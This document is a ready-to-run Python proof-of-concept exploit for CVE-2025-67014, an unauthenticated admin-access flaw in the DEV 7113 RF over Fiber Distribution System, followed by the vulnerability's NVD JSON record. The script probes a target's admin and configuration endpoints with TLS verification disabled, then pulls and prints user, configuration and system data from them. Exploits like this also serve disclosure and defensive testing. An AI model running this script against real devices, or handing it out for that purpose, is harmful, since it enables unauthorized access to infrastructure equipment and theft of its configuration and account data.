CVE-2025-67014

import requests # CVE-2025-67014 PoC - Unauthenticated Admin Access # Target: DEV Systemtechnik GmbH DEV 7113 RF over Fiber Distribution System def check_vulnerability(target_url): """ Check if the target is vulnerable to CVE-2025-67014 Unauthenticated access to admin endpoint """ endpoints = [ "/admin", "/api/admin", "/api/management", "/management", "/api/v1/admin", "/api/v1/management", "/config", "/api/config", "/status", "/api/status" ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-67014 - Unauthenticated Admin Access\n") for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.get(url, timeout=10, verify=False) if response.status_code == 200 and ('admin' in response.text.lower() or 'configuration' in response.text.lower()): print(f"[+] VULNERABLE: {url}") print(f"[+] Status Code: {response.status_code}") print(f"[+] Response Length: {len(response.text)} bytes") print(f"[+] Sample Content: {response.text[:200]}...\n") else: print(f"[-] Not vulnerable: {url} (Status: {response.status_code})") except requests.exceptions.RequestException as e: print(f"[!] Error accessing {url}: {e}") def exploit_admin_access(target_url): """ Exploit CVE-2025-67014 to gather admin information """ admin_endpoints = [ "/api/admin/users", "/api/admin/config", "/api/admin/system", "/api/management/settings" ] print("\n[*] Attempting to extract sensitive information...\n") for endpoint in admin_endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: print(f"[+] SUCCESS: Extracted data from {endpoint}") print(f"[+] Data: {response.text[:500]}\n") except requests.exceptions.RequestException: pass if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python cve-2025-67014.py <target_url>") print("Example: python cve-2025-67014.py http://192.168.1.100") sys.exit(1) target = sys.argv[1] check_vulnerability(target) exploit_admin_access(target)

{"cve": {"id": "CVE-2025-67014", "sourceIdentifier": "[email protected]", "published": "2025-12-26T16:15:44.473", "lastModified": "2026-01-09T20:43:25.100", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect access control in DEV Systemtechnik GmbH DEV 7113 RF over Fiber Distribution System 32-0078 H.01 allows unauthenticated attackers to access an administrative endpoint."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:axing:dev7113_firmware:32-0078_h.01:*:*:*:*:*:*:*", "matchCriteriaId": "AA4AC7C5-122E-44AF-A198-D9DFC45A3A20"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:axing:dev7113:-:*:*:*:*:*:*:*", "matchCriteriaId": "829C90A0-CFFA-40B4-A8D8-206292DBACAC"}]}]}], "references": [{"url": "https://dev-systemtechnik.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-67014%20_%20DEV%20Systemtechnik%20GmbH%20DEV%207113%20RF%20over%20_%20Broken%20Access%20Control", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "Mitigation"]}]}}